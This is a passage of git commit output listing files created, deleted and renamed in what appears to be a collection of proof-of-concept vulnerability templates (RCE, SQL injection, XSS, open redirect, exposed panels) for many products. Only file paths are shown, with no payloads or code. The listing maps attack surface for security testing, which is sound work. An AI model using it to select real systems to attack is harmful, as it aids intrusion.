poc/microsoft/saferoads-vms-login-9970.yaml create mode 100644 poc/microsoft/saferoads-vms-login-9973.yaml rename poc/microsoft/{samsung-wlan-ap-rce-10009.yaml => samsung-wlan-ap-rce.yaml} (100%) delete mode 100644 poc/microsoft/strapi-cms-detect.yaml create mode 100644 poc/microsoft/tikiwiki-cms-10774.yaml delete mode 100644 poc/microsoft/top-xss-params-10809.yaml delete mode 100644 poc/microsoft/vpms-auth-bypass-11066.yaml rename poc/microsoft/{wems-manager-xss-11192.yaml => wems-manager-xss-11194.yaml} (100%) delete mode 100644 poc/microsoft/wems-manager-xss.yaml create mode 100644 poc/microsoft/wondercms-detect-11223.yaml rename poc/microsoft/{wondercms-detect-11222.yaml => wondercms-detect.yaml} (100%) delete mode 100644 poc/microsoft/wp-arforms-listing-11415.yaml create mode 100644 poc/microsoft/wp-arforms-listing-11418.yaml delete mode 100644 poc/microsoft/wp-mstore-plugin-listing.yaml delete mode 100644 poc/microsoft/wp-plugin-lifterlms-11536.yaml create mode 100644 poc/microsoft/wp-sfwd-lms-listing-11562.yaml delete mode 100644 poc/microsoft/wuzhicms-detect.yaml delete mode 100644 poc/microsoft/wuzhicms-sqli-11656.yaml delete mode 100644 poc/microsoft/xdcms-sqli-11664.yaml delete mode 100644 poc/microsoft/xdcms-sqli.yaml delete mode 100644 poc/microsoft/zcms-v3-sqli-11773.yaml rename poc/microsoft/{zms-auth-bypass-11830.yaml => zms-auth-bypass-11832.yaml} (100%) create mode 100644 poc/mongodb/alibaba-mongoshake-unauth-268.yaml delete mode 100644 poc/mongodb/mongodb-ops-manager-8922.yaml delete mode 100644 poc/mongodb/mongodb-unauth.yaml delete mode 100644 poc/mongodb/rockmongo-default-login.yaml delete mode 100644 poc/mongodb/rockmongo-xss-9902.yaml create mode 100644 poc/mongodb/unauthenticated-mongo-express-10911.yaml delete mode 100644 poc/mysql/exposed-mysql-initial.yaml delete mode 100644 poc/netlify/netlify-cms-9039.yaml create mode 100644 poc/netlify/netlify-cms-9041.yaml create mode 100644 poc/nginx/default-nginx-page-6880.yaml create mode 100644 poc/nginx/git-config-nginxoffbyslash-7628.yaml rename poc/nginx/{nginx-config.yaml => nginx-config-9097.yaml} (100%) delete mode 100644 poc/nginx/nginx-config-9098.yaml create mode 100644 poc/nginx/nginx-linux-page-9102.yaml create mode 100644 poc/nginx/nginx-merge-slashes-path-traversal-9105.yaml delete mode 100644 poc/nginx/nginx-merge-slashes-path-traversal.yaml create mode 100644 poc/nginx/nginx-module-vts-xss-9109.yaml delete mode 100644 poc/nodejs/api-npm.yaml create mode 100644 poc/nodejs/express-lfr (copy 1).yaml create mode 100644 poc/nodejs/gradle-cache-node-detect-7798.yaml create mode 100644 poc/nodejs/lfr_express.yaml rename poc/nodejs/{node-integration-enabled-9136.yaml => node-integration-enabled-9137.yaml} (100%) create mode 100644 poc/nodejs/node-red-detect-9139.yaml delete mode 100644 poc/nodejs/node-red-detect.yaml create mode 100644 poc/nodejs/unauthenticated-mongo-express-10911.yaml rename poc/nodejs/{unauthorized-puppet-node-manager-detect-10958.yaml => unauthorized-puppet-node-manager-detect-10959.yaml} (100%) delete mode 100644 poc/open_redirect/aspnuke-openredirect-556.yaml rename poc/open_redirect/{aspnuke-openredirect.yaml => aspnuke-openredirect-557.yaml} (100%) delete mode 100644 poc/open_redirect/attitude-theme-open-redirect-586.yaml rename poc/open_redirect/{attitude-theme-open-redirect.yaml => attitude-theme-open-redirect-588.yaml} (100%) delete mode 100644 poc/open_redirect/bitrix-open-redirect-743.yaml create mode 100644 poc/open_redirect/bitrix-open-redirect-744.yaml create mode 100644 poc/open_redirect/caddy-open-redirect-836.yaml delete mode 100644 poc/open_redirect/caddy-open-redirect-837.yaml delete mode 100644 poc/open_redirect/drupal-user-enum-redirect-7114.yaml create mode 100644 poc/open_redirect/drupal-user-enum-redirect-7115.yaml delete mode 100644 poc/open_redirect/homeautomation-v3-openredirect-7982.yaml create mode 100644 poc/open_redirect/httpbin-open-redirect-8047.yaml delete mode 100644 poc/open_redirect/httpbin-open-redirect.yaml create mode 100644 poc/open_redirect/netsweeper-open-redirect.yaml delete mode 100644 poc/open_redirect/ninjaform-open-redirect-9133.yaml delete mode 100644 poc/open_redirect/odoo-cms-redirect.yaml delete mode 100644 poc/open_redirect/office365-open-redirect-9215.yaml delete mode 100644 poc/open_redirect/open-redirect-9308.yaml create mode 100644 poc/open_redirect/pieregister-open-redirect-9579.yaml delete mode 100644 poc/open_redirect/pieregister-open-redirect.yaml delete mode 100644 poc/open_redirect/pieregister-plugin-open-redirect.yaml create mode 100644 poc/open_redirect/pollbot-redirect-9622.yaml delete mode 100644 poc/open_redirect/pollbot-redirect.yaml delete mode 100644 poc/open_redirect/sap-redirect-10064.yaml rename poc/open_redirect/{thinkific-redirect-10732.yaml => thinkific-redirect.yaml} (100%) delete mode 100644 poc/open_redirect/ultimatemember-open-redirect-10877.yaml delete mode 100644 poc/open_redirect/weekender-newspaper-open-redirect-11186.yaml delete mode 100644 poc/open_redirect/weekender-newspaper-open-redirect.yaml delete mode 100644 poc/open_redirect/wordpress-redirection-plugin-listing-11306.yaml rename poc/open_redirect/{wordpress-redirection-plugin-listing.yaml => wordpress-redirection-plugin-listing-11308.yaml} (100%) create mode 100644 poc/open_redirect/wp-grimag-open-redirect-11462.yaml create mode 100644 poc/open_redirect/wp-gtranslate-open-redirect-11465.yaml create mode 100644 poc/open_redirect/wptouch-open-redirect-11595.yaml delete mode 100644 poc/oracle/default-oracle-application-page.yaml create mode 100644 poc/oracle/metadata-oracle-8830.yaml create mode 100644 poc/oracle/oracle-business-control-9346.yaml create mode 100644 poc/oracle/oracle-dbass-detect-9351.yaml delete mode 100644 poc/oracle/oracle-ebs-bispgraph-file-access-9359.yaml delete mode 100644 poc/oracle/oracle-ebs-credentials-9365.yaml create mode 100644 poc/oracle/oracle-ebs-credentials-9366.yaml delete mode 100644 poc/oracle/oracle-ebs-sqllog-disclosure-9371.yaml delete mode 100644 poc/oracle/oracle-integrated-manager-9386.yaml create mode 100644 poc/oracle/oracle-iplanet-web-server-9393.yaml create mode 100644 poc/oracle/oracle-iplanet-web-server.yaml delete mode 100644 poc/oracle/oracle-oam-xss.yaml create mode 100644 poc/oracle/oracle-siebel-xss.yaml delete mode 100644 poc/other/3g-wireless-gateway-5.yaml create mode 100644 poc/other/3g-wireless-gateway.yaml create mode 100644 poc/other/LayerSlider-plugin.yaml create mode 100644 poc/other/WSO2-2019-0598.yaml delete mode 100644 poc/other/X-Remote-Addr.yaml delete mode 100644 poc/other/X-Remote-IP.yaml create mode 100644 poc/other/acrolinx-dashboard-36.yaml delete mode 100644 poc/other/acrolinx-dashboard-37.yaml create mode 100644 poc/other/acunetix-panel-58.yaml create mode 100644 poc/other/adiscon-loganalyzer-67.yaml delete mode 100644 poc/other/adiscon-loganalyzer-68.yaml delete mode 100644 poc/other/adminer-panel-76.yaml create mode 100644 poc/other/adminer-panel-77.yaml create mode 100644 poc/other/adminset-panel-79.yaml delete mode 100644 poc/other/adminset-panel-80.yaml delete mode 100644 poc/other/akamai-cloudtest-250.yaml delete mode 100644 poc/other/akamai-cloudtest-253.yaml create mode 100644 poc/other/alienvault-usm-271.yaml rename poc/other/{alienvault-usm-272.yaml => alienvault-usm.yaml} (100%) delete mode 100644 poc/other/ampps-admin-panel-306.yaml create mode 100644 poc/other/ampps-dirlisting-307.yaml delete mode 100644 poc/other/antsword-backdoor-335.yaml delete mode 100644 poc/other/artifactory-anonymous-deploy-547.yaml create mode 100644 poc/other/artifactory-anonymous-deploy-549.yaml create mode 100644 poc/other/aspose-file-download.yaml rename poc/other/{aspose-pdf-file-download.yaml => aspose-pdf-file-download-570.yaml} (100%) create mode 100644 poc/other/aspose-words-file-download-572.yaml create mode 100644 poc/other/aviatrix-panel-608.yaml delete mode 100644 poc/other/aviatrix-panel-610.yaml create mode 100644 poc/other/avtech-avn801-camera-panel-612.yaml delete mode 100644 poc/other/avtech-avn801-camera-panel-613.yaml create mode 100644 poc/other/axis-happyaxis-670.yaml rename poc/other/{bitrix_bak_check.yaml => bak.yaml} (100%) create mode 100644 poc/other/basic-cors-693.yaml delete mode 100644 poc/other/bitrix-panel-748.yaml create mode 100644 poc/other/bitrix-panel-750.yaml create mode 100644 poc/other/buddy-panel-796.yaml create mode 100644 poc/other/cacti-weathermap-file-write-831.yaml delete mode 100644 poc/other/cacti-weathermap-file-write-833.yaml create mode 100644 poc/other/campaignmonitor-843.yaml delete mode 100644 poc/other/can-i-take-over-dns-852.yaml create mode 100644 poc/other/cerebro-panel-879.yaml delete mode 100644 poc/other/cerebro-panel-881.yaml create mode 100644 poc/other/cgi-printenv-885.yaml delete mode 100644 poc/other/cgi-printenv.yaml create mode 100644 poc/other/checkmarx-panel-895.yaml delete mode 100644 poc/other/checkmarx-panel-897.yaml delete mode 100644 poc/other/checkpoint-panel-899.yaml create mode 100644 poc/other/cherry-file-download-900.yaml delete mode 100644 poc/other/cherry-file-download.yaml rename poc/other/{clearpass-policy-manager-997.yaml => clearpass-policy-manager-1001.yaml} (100%) create mode 100644 poc/other/clientaccesspolicy-1006.yaml create mode 100644 poc/other/cname-fingerprint-1030.yaml create mode 100644 poc/other/codeigniter-env-1133.yaml delete mode 100644 poc/other/codeigniter-env-1134.yaml create mode 100644 poc/other/cold-fusion-cfcache-map-1149.yaml delete mode 100644 poc/other/compal.yaml create mode 100644 poc/other/concourse-ci-panel-1169.yaml delete mode 100644 poc/other/concrete5-panel-1172.yaml create mode 100644 poc/other/concrete5-panel-1173.yaml create mode 100644 poc/other/content-scheme-1204.yaml delete mode 100644 poc/other/content-scheme-1206.yaml create mode 100644 poc/other/crossdomain-xml-1269.yaml delete mode 100644 poc/other/crossdomain-xml.yaml rename poc/other/{csod-panel-1286.yaml => csod-panel-1289.yaml} (100%) delete mode 100644 poc/other/d-link-arbitary-fileread-7045.yaml create mode 100644 poc/other/d-link-wireless-7050.yaml create mode 100644 poc/other/dead-host-with-cname-6786.yaml rename poc/other/{dell-idrac-workflow.yaml => dell-idrac-workflow-6947.yaml} (100%) create mode 100644 poc/other/deprecated-tls-6958.yaml delete mode 100644 poc/other/development-logs-6987.yaml create mode 100644 poc/other/diaowen-fileread.yaml rename poc/{http/http-value-share-template-2.yaml => other/dns-value-share-template-3.yaml} (100%) delete mode 100644 poc/other/domcfg-page-7077.yaml delete mode 100644 poc/other/ds-store-file.yaml create mode 100644 poc/other/ds_store-7119.yaml delete mode 100644 poc/other/dynamic-broadcast-receiver-7140.yaml delete mode 100644 poc/other/dynamic-broadcast-receiver-7141.yaml create mode 100644 poc/other/envision-gateway.yaml create mode 100644 poc/other/epson-wf-series-7244.yaml delete mode 100644 poc/other/epson-wf-series.yaml delete mode 100644 poc/other/error-logs-7251.yaml create mode 100644 poc/other/eyelock-nano-lfd-7376.yaml create mode 100644 poc/other/eyelock-nano-lfd.yaml create mode 100644 poc/other/f-secure-policy-manager-7563.yaml create mode 100644 poc/other/file-scheme-7469.yaml create mode 100644 poc/other/firebase-urls-7499.yaml rename poc/other/{flightpath-panel-7508.yaml => flightpath-panel-7507.yaml} (100%) delete mode 100644 poc/other/fortinet-fortigate-panel-7533.yaml delete mode 100644 poc/other/fortinet-fortigate-panel-7536.yaml create mode 100644 poc/other/foulenzer-subdomain-tk (copy 1).yaml create mode 100644 poc/other/glpidirectorylisting(1).yaml create mode 100644 poc/other/glpidirectorylisting.yaml delete mode 100644 poc/other/gogs-workflow-7760.yaml create mode 100644 poc/other/gogs-workflow.yaml delete mode 100644 poc/other/haproxy-status-7883.yaml delete mode 100644 poc/other/heatmiser-wifi-thermostat.yaml create mode 100644 poc/other/hikvision-info-leak-7958.yaml delete mode 100644 poc/other/hikvision-info-leak.yaml delete mode 100644 poc/other/hitron-technologies-7961.yaml create mode 100644 poc/other/hitron-technologies-7962.yaml create mode 100644 poc/other/home-assistant-7980.yaml delete mode 100644 poc/other/hp-ilo-5-8018.yaml create mode 100644 poc/other/huawei-hg532e-panel-8065.yaml delete mode 100644 poc/other/huijietong-cloud-fileread-8085.yaml delete mode 100644 poc/other/huijietong-cloud-fileread-8086.yaml rename poc/other/{identity-services-engine-8145.yaml => identity-services-engine-8144.yaml} (100%) create mode 100644 poc/other/iis-shortname-8151.yaml create mode 100644 poc/other/internet-service.yaml delete mode 100644 poc/other/ioncube-loader-wizard-8184.yaml create mode 100644 poc/other/ioncube-loader-wizard.yaml create mode 100644 poc/other/jamf-panel-8216.yaml create mode 100644 poc/other/jfrog-8303.yaml delete mode 100644 poc/other/jfrog-8306.yaml create mode 100644 poc/other/jkstatus-manager-8344.yaml delete mode 100644 poc/other/jmx-console-8353.yaml delete mode 100644 poc/other/jolokia-list-8360.yaml create mode 100644 poc/other/jupyter-notebook-8407.yaml delete mode 100644 poc/other/keo-klr300n-install.yaml rename poc/other/{kerio-connect-client-8452.yaml => kerio-connect-client-8450.yaml} (100%) create mode 100644 poc/other/klr300n-installer.yaml create mode 100644 poc/other/kubelet-healthz-8519.yaml create mode 100644 poc/other/kubelet-healthz.yaml delete mode 100644 poc/other/kubelet-pods.yaml create mode 100644 poc/other/layerslider-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml delete mode 100644 poc/other/leostream-panel-8610.yaml rename poc/other/{liveview-axis-camera-8646.yaml => liveview-axis-camera.yaml} (100%) delete mode 100644 poc/other/manageengine-adaudit-8730.yaml create mode 100644 poc/other/manageengine-adselfservice-8738.yaml create mode 100644 poc/other/manageengine-apex-helpdesk-8747.yaml delete mode 100644 poc/other/manageengine-apex-helpdesk-8748.yaml delete mode 100644 poc/other/manageengine-applications-manager-8751.yaml create mode 100644 poc/other/manageengine-applications-manager-8753.yaml create mode 100644 poc/other/manageengine-desktop-8761.yaml delete mode 100644 poc/other/manageengine-desktop-8763.yaml create mode 100644 poc/other/manageengine-servicedesk-8771.yaml create mode 100644 poc/other/manageengine-supportcenter-8776.yaml rename poc/other/{matcher-with-or.yaml => matcher-with-and.yaml} (100%) delete mode 100644 poc/other/memcached-stats-8799.yaml create mode 100644 poc/other/memcached-stats.yaml mode change 100644 => 100755 poc/other/metadata-alibaba.yaml delete mode 100644 poc/other/metadata-azure-8815.yaml delete mode 100644 poc/other/metadata-hetzner-8822.yaml create mode 100644 poc/other/metadata-hetzner-8824.yaml delete mode 100644 poc/other/metadata-openstack.yaml delete mode 100755 poc/other/metadata-service-alibaba.yaml delete mode 100644 poc/other/mikrotik-graph-8870.yaml create mode 100644 poc/other/mikrotik-graph-8871.yaml create mode 100644 poc/other/mikrotik-routeros-8873.yaml delete mode 100644 poc/other/mikrotik-routeros-8875.yaml create mode 100644 poc/other/minecraft-enum.yaml rename poc/other/{mobileiron.yaml => mobileiron(1).yaml} (100%) delete mode 100644 poc/other/moodle-changelog-8934.yaml create mode 100644 poc/other/moodle-changelog-8936.yaml delete mode 100644 poc/other/nagios-status-page-8996.yaml create mode 100644 poc/other/nessus-panel-9017.yaml delete mode 100644 poc/other/nessus-panel-9020.yaml delete mode 100644 poc/other/netis-info-leak.yaml delete mode 100644 poc/other/netrc-9045.yaml create mode 100644 poc/other/netscaler-gateway-9055.yaml create mode 100644 poc/other/nextcloud-install-9084.yaml delete mode 100644 poc/other/nextcloud-install-9085.yaml delete mode 100644 poc/other/niagara-fox-info-enum.yaml create mode 100644 poc/other/niagara-fox-protocol-enum.yaml create mode 100644 poc/other/nifi-detech-9131.yaml delete mode 100644 poc/other/nomad-jobs.yaml create mode 100644 poc/other/ns-asg-file-read-9151.yaml create mode 100644 poc/other/ntlm-directories-9155.yaml delete mode 100644 poc/other/ntlm-directories-9156.yaml delete mode 100644 poc/other/nuuo-file-inclusion.yaml create mode 100644 poc/other/open-mjpg-streamer-9283.yaml delete mode 100644 poc/other/open-proxy-internal-9289.yaml create mode 100644 poc/other/open-proxy-internal-9290.yaml delete mode 100644 poc/other/open-proxy-localhost-9293.yaml delete mode 100644 poc/other/open-proxy-portscan-9295.yaml create mode 100644 poc/other/open-virtualization-manager-panel-9327.yaml delete mode 100644 poc/other/open-virtualization-manager-panel-9328.yaml create mode 100644 poc/other/openam-workflow-9258.yaml rename poc/other/{openam-workflow-9259.yaml => openam-workflow.yaml} (100%) delete mode 100644 poc/other/pacs-connexion-utilisateur-9426.yaml rename poc/other/{pagespeed-global-admin-9431.yaml => pagespeed-global-admin-9433.yaml} (100%) delete mode 100644 poc/other/panasonic-network-management-9448.yaml rename poc/other/{panasonic-network-management.yaml => panasonic-network-management-9450.yaml} (100%) rename poc/other/{pentaho-panel-9481.yaml => pentaho-panel-9483.yaml} (100%) create mode 100644 poc/other/phoronix-pane;.yaml delete mode 100644 poc/other/plesk-obsidian-9594.yaml create mode 100644 poc/other/plesk-onyx-9598.yaml delete mode 100644 poc/other/plesk-onyx-9601.yaml create mode 100644 poc/other/postmessage-outgoing-tracker-9636.yaml create mode 100644 poc/other/postmessage-outgoing-tracker.yaml delete mode 100644 poc/other/postmessage-tracker-9639.yaml create mode 100644 poc/other/powerlogic-ion-9648.yaml delete mode 100644 poc/other/powerlogic-ion-9650.yaml create mode 100644 poc/other/prometheus-exporter-9677.yaml rename poc/other/{prometheus-exporter-9678.yaml => prometheus-exporter.yaml} (100%) create mode 100644 poc/other/prometheus-flags-9687.yaml delete mode 100644 poc/other/prometheus-flags.yaml rename poc/other/{prometheus-targets-9690.yaml => prometheus-targets.yaml} (100%) create mode 100644 poc/other/promothoues-panel (copy 1).yaml delete mode 100644 poc/other/prototype-pollution-check-9697.yaml create mode 100644 poc/other/prototype-pollution-check-9698.yaml create mode 100644 poc/other/ptr.yaml delete mode 100644 poc/other/pulse-secure-panel-9714.yaml rename poc/other/{put-method-enabled.yaml => put-method-enabled-9726.yaml} (100%) rename poc/other/{qdpm-info-leak-9754.yaml => qdpm-info-leak-9750.yaml} (100%) create mode 100644 poc/other/qdpm-info-leak.yaml rename poc/other/{race-multiple.yaml => race-simple.yaml} (100%) delete mode 100644 poc/other/rack-mini-profiler-9792.yaml create mode 100644 poc/other/radius-manager-9795.yaml delete mode 100644 poc/other/radius-manager-9796.yaml delete mode 100644 poc/other/request-based-interaction-9862.yaml create mode 100644 poc/other/resin-viewfile-lfr-9874.yaml create mode 100644 poc/other/robots-txt-9886.yaml create mode 100644 poc/other/rsa-self-service-9910.yaml delete mode 100644 poc/other/rsa-self-service-9912.yaml delete mode 100644 poc/other/scs-landfill-control-10097.yaml create mode 100644 poc/other/scs-landfill-control-10098.yaml delete mode 100644 poc/other/securenvoy-panel-10114.yaml create mode 100644 poc/other/securenvoy-panel-10116.yaml create mode 100644 poc/other/securepoint-utm-10117.yaml delete mode 100644 poc/other/securepoint-utm-10118.yaml create mode 100644 poc/other/security-10123.yaml delete mode 100644 poc/other/selea-ip-camera-10134.yaml delete mode 100644 poc/other/server-status-localhost-10166.yaml delete mode 100644 poc/other/servfail-refused-hosts-10170.yaml delete mode 100644 poc/other/shell-history-10191.yaml create mode 100644 poc/other/shell-history-10192.yaml delete mode 100644 poc/other/shell_scripts.yaml delete mode 100644 poc/other/signatures-10268.yaml rename poc/other/{sitecore-version-10292.yaml => sitecore-version.yaml} (100%) delete mode 100644 poc/other/skycaiji-admin-panel-10304.yaml create mode 100644 poc/other/skycaiji-admin-panel-10306.yaml rename poc/other/{skycaiji-install-10307.yaml => skycaiji-install.yaml} (100%) create mode 100644 poc/other/solr-query-dashboard.yaml delete mode 100644 poc/other/sonarqube-public-projects-10377.yaml create mode 100644 poc/other/sonarqube-public-projects-10379.yaml rename poc/other/{sonicwall-management-panel-10387.yaml => sonicwall-management-panel-10385.yaml} (100%) delete mode 100644 poc/other/sonicwall-sslvpn-panel-10388.yaml create mode 100644 poc/other/sonicwall-sslvpn-panel-10390.yaml delete mode 100644 poc/other/sonicwall-sslvpn-shellshock-10395.yaml create mode 100644 poc/other/spidercontrol-scada-server-info-10413.yaml delete mode 100644 poc/other/splunk-enterprise-panel-10415.yaml delete mode 100644 poc/other/spoofable-spf-records-ptr-10427.yaml create mode 100644 poc/other/sugarcrm-panel-10569.yaml delete mode 100644 poc/other/symantec-messaging-gateway-10607.yaml rename poc/other/{symfony-profiler-10626.yaml => symfony-profiler-10627.yaml} (100%) create mode 100644 poc/other/tableau-panel-10641.yaml delete mode 100644 poc/other/tableau-panel-10642.yaml rename poc/other/{tekon-info-leak-10685.yaml => tekon-info-leak.yaml} (100%) create mode 100644 poc/other/thinkcmf-arbitrary-code-execution-10715.yaml delete mode 100644 poc/other/thinkcmf-arbitrary-code-execution.yaml delete mode 100644 poc/other/thinkcmf-workflow-10730.yaml create mode 100644 poc/other/thinkcmf_include.yaml delete mode 100644 poc/other/tileserver-gl-10786.yaml create mode 100644 poc/other/tileserver-gl.yaml delete mode 100644 poc/other/tor-socks-proxy-10811.yaml create mode 100644 poc/other/tuxedo-connected-controller-10852.yaml delete mode 100644 poc/other/tuxedo-connected-controller-10853.yaml create mode 100644 poc/other/txt-fingerprint-10863.yaml delete mode 100644 poc/other/txt-fingerprint.yaml create mode 100644 poc/other/ups-status-10985.yaml rename poc/other/{ups-status-10983.yaml => ups-status.yaml} (100%) delete mode 100644 poc/other/wago-plc-panel-11091.yaml create mode 100644 poc/other/wago-plc-panel-11093.yaml delete mode 100644 poc/other/wallix-accessmanager-panel-11094.yaml create mode 100644 poc/other/wallix-accessmanager-panel-11095.yaml create mode 100644 poc/other/wireless-leakage.yaml create mode 100644 poc/other/wooyun-2015-148227(1).yaml delete mode 100644 poc/other/wso2-2019-0598-11636.yaml create mode 100644 poc/other/wso2mgmtconsole.yaml create mode 100644 poc/other/xds-amr-status-11668.yaml delete mode 100644 poc/other/xds-amr-status-11669.yaml rename poc/other/{yarn-lock.yaml => yarn-lock-11730.yaml} (100%) delete mode 100644 poc/other/yopass-panel-11749.yaml create mode 100644 poc/other/yopass-panel-11750.yaml delete mode 100644 poc/other/zabbix-dashboards-access-11754.yaml create mode 100644 poc/other/zabbix-dashboards-access-11757.yaml delete mode 100644 poc/other/zhiyuan-oa-info-leak-11799.yaml rename poc/other/{zhiyuan-oa-info-leak.yaml => zhiyuan-oa-info-leak-11800.yaml} (100%) delete mode 100644 poc/other/zhongkewangwei-fileread.yaml create mode 100644 poc/other/zte-panel-11840.yaml delete mode 100644 poc/other/zte-panel-11841.yaml create mode 100644 poc/perl/perl-status-9487.yaml delete mode 100644 poc/php/clockwork-php-page-1016.yaml rename poc/php/{clockwork-php-page-1018.yaml => clockwork-php-page-1019.yaml} (100%) rename poc/php/{php-backup-files-9497.yaml => php-backup-files-9498.yaml} (100%) create mode 100644 poc/php/php-debug-bar-9507.yaml create mode 100644 poc/php/php-fpm-config-9514.yaml delete mode 100644 poc/php/php-fpm-config.yaml delete mode 100644 poc/php/php-proxy-detect-9545.yaml create mode 100644 poc/php/php-proxy-detect.yaml create mode 100644 poc/php/php-timeclock-xss-9550.yaml rename poc/php/{php-timeclock-xss-9553.yaml => php-timeclock-xss.yaml} (100%) delete mode 100644 poc/php/php-warning-9562.yaml create mode 100644 poc/php/php-zerodium-backdoor-rce-9569.yaml create mode 100644 poc/php/phpcollab-detect-9499.yaml delete mode 100644 poc/php/phpcollab-detect-9501.yaml create mode 100644 poc/php/phpcollab-workflow.yaml rename poc/php/{phpinfo-files.yaml => phpinfo-9521.yaml} (100%) rename poc/php/{phpmyadmin-panel-9525.yaml => phpmyadmin-panel-9526.yaml} (100%) delete mode 100644 poc/php/phpmyadmin-setup(1).yaml create mode 100644 poc/php/phpmyadmin-setup-9531.yaml delete mode 100644 poc/php/phpmyadmin-sql-9535.yaml create mode 100644 poc/php/phpmyadmin-sql-9536.yaml create mode 100644 poc/php/phppgadmin-panel-9541.yaml rename poc/php/{phpunit.yaml => phpunit-9556.yaml} (100%) delete mode 100644 poc/php/phpunit-9557.yaml delete mode 100644 poc/php/phpwiki-lfi.yaml create mode 100644 poc/php/ruijie-phpinfo-9951.yaml delete mode 100644 poc/php/thinkphp-2-rce-10738.yaml create mode 100644 poc/php/thinkphp-2-rce-10740.yaml create mode 100644 poc/php/thinkphp-501-rce-10743.yaml delete mode 100644 poc/php/thinkphp-501-rce.yaml create mode 100644 poc/php/thinkphp-509-information-disclosure-10753.yaml create mode 100644 poc/php/wp-phpfreechat-xss-11525.yaml create mode 100644 poc/python/autobahn-python-detect-594.yaml rename poc/python/{default-django-page-6840.yaml => default-django-page.yaml} (100%) delete mode 100644 poc/python/django-admin-panel-7021.yaml create mode 100644 poc/python/django-admin-panel-7023.yaml delete mode 100644 poc/python/django-debug-detect-7026.yaml rename poc/python/{django-debug.yml => django-debug.yaml} (100%) create mode 100644 poc/python/django-secret-key.yaml delete mode 100644 poc/python/django-secret.key.yaml create mode 100644 poc/python/jupyter-ipython-unauth-8402.yaml delete mode 100644 poc/python/python-app-sql-exceptions-9744.yaml create mode 100644 poc/python/python-app-sql-exceptions.yaml create mode 100644 poc/python/python-metrics-9747.yaml delete mode 100644 poc/rabbitmq/rabbitmq-default-login-9786.yaml delete mode 100644 poc/rabbitmq/rabbitmq-default-login.yaml delete mode 100644 poc/redis/exposed-redis-7336.yaml create mode 100644 poc/remote_code_execution/apache-flink-unauth-rce-356.yaml create mode 100644 poc/remote_code_execution/apache-nifi-rce.yaml delete mode 100644 poc/remote_code_execution/apache-ofbiz-log4j-rce-366.yaml create mode 100644 poc/remote_code_execution/apache-ofbiz-log4j-rce.yaml delete mode 100644 poc/remote_code_execution/apache-solr-log4j-rce-372.yaml create mode 100644 poc/remote_code_execution/cisco-cloudcenter-suite-log4j-rce.yaml delete mode 100644 poc/remote_code_execution/cisco-cloudcenter-suite-rce.yaml rename poc/remote_code_execution/{clockwatch-enterprise-rce-1009.yaml => clockwatch-enterprise-rce-1010.yaml} (100%) delete mode 100644 poc/remote_code_execution/code42-log4j-rce.yaml create mode 100644 poc/remote_code_execution/core-chuangtian-cloud-rce-1207.yaml delete mode 100644 poc/remote_code_execution/core-chuangtian-cloud-rce-1211.yaml delete mode 100644 poc/remote_code_execution/elex-woocommerce-xss-7200.yaml delete mode 100644 poc/remote_code_execution/elex-woocommerce-xss.yaml create mode 100644 poc/remote_code_execution/eyou-email-rce-7378.yaml create mode 100644 poc/remote_code_execution/fastjson-1-2-41-rce.yaml create mode 100644 poc/remote_code_execution/fastjson-1-2-47-rce-7415.yaml create mode 100644 poc/remote_code_execution/fastjson-1-2-67-rce.yaml delete mode 100644 poc/remote_code_execution/fastjson-1-2-68-rce-7425.yaml create mode 100644 poc/remote_code_execution/gitlab-rce.yaml create mode 100644 poc/remote_code_execution/h3c-imc-rce-7868.yaml create mode 100644 poc/remote_code_execution/hashicorp-consul-rce-7891.yaml rename poc/remote_code_execution/{icewarp-webclient-rce.yaml => icewarp-webclient-rce-8129.yaml} (100%) rename poc/remote_code_execution/{lotuscms-rce-8652.yaml => lotuscms-rce-8653.yaml} (100%) create mode 100644 poc/remote_code_execution/maian-cart-preauth-rce-8721.yaml rename poc/remote_code_execution/{mcafee-epo-rce-8793.yaml => mcafee-epo-rce-8794.yaml} (100%) create mode 100644 poc/remote_code_execution/metersphere-plugin-rce.yaml delete mode 100644 poc/remote_code_execution/mirai-unknown-rce-8899.yaml create mode 100644 poc/remote_code_execution/mirai-unknown-rce.yaml create mode 100644 poc/remote_code_execution/natshell-rce-9009.yaml delete mode 100644 poc/remote_code_execution/natshell-rce.yaml create mode 100644 poc/remote_code_execution/nuuo-nvrmini2-rce-9171.yaml create mode 100644 poc/remote_code_execution/optilink-ont1gew-gpon-rce-9343.yaml rename poc/remote_code_execution/{optilink-ont1gew-gpon-rce-9342.yaml => optilink-ont1gew-gpon-rce.yaml} (100%) create mode 100644 poc/remote_code_execution/oscommerce-rce-9405.yaml rename poc/remote_code_execution/{oscommerce-rce-9407.yaml => oscommerce-rce.yaml} (100%) create mode 100644 poc/remote_code_execution/pdf-signer-ssti-to-rce-9470.yaml create mode 100644 poc/remote_code_execution/phalcon-framework-source-9496.yaml create mode 100644 poc/remote_code_execution/php-zerodium-backdoor-rce-9569.yaml create mode 100644 poc/remote_code_execution/powercreator-cms-rce-9644.yaml delete mode 100644 poc/remote_code_execution/powercreator-cms-rce-9646.yaml delete mode 100644 poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9761.yaml rename poc/remote_code_execution/{qi-anxin-netkang-next-generation-firewall-rce-9757.yaml => qi-anxin-netkang-next-generation-firewall-rce.yaml} (100%) rename poc/remote_code_execution/{qvisdvr-deserialization-rce.yaml => qvisdvr-deserialization-rce-9772.yaml} (100%) delete mode 100644 poc/remote_code_execution/qvisdvr-deserialization-rce-9774.yaml create mode 100644 poc/remote_code_execution/rce-cve-2021-41773.yaml delete mode 100644 poc/remote_code_execution/rconfig-rce-9834.yaml delete mode 100644 poc/remote_code_execution/ruijie-eg-rce-9926.yaml delete mode 100644 poc/remote_code_execution/ruijie-networks-rce-9945.yaml create mode 100644 poc/remote_code_execution/salesforce-aura-9984.yaml rename poc/remote_code_execution/{samsung-wlan-ap-rce-10009.yaml => samsung-wlan-ap-rce.yaml} (100%) create mode 100644 poc/remote_code_execution/sangfor-ba-rce-10020.yaml create mode 100644 poc/remote_code_execution/sangfor-edr-rce-10028.yaml delete mode 100644 poc/remote_code_execution/sar2html-rce.yaml create mode 100644 poc/remote_code_execution/showdoc-file-upload-rce-10229.yaml create mode 100644 poc/remote_code_execution/simple-employee-rce-10279.yaml delete mode 100644 poc/remote_code_execution/simple-employee-rce-10280.yaml create mode 100644 poc/remote_code_execution/spon-ip-rce.yaml delete mode 100644 poc/remote_code_execution/sponip-network-system-ping-rce-10423.yaml delete mode 100644 poc/remote_code_execution/springboot-h2-db-rce-10454.yaml rename 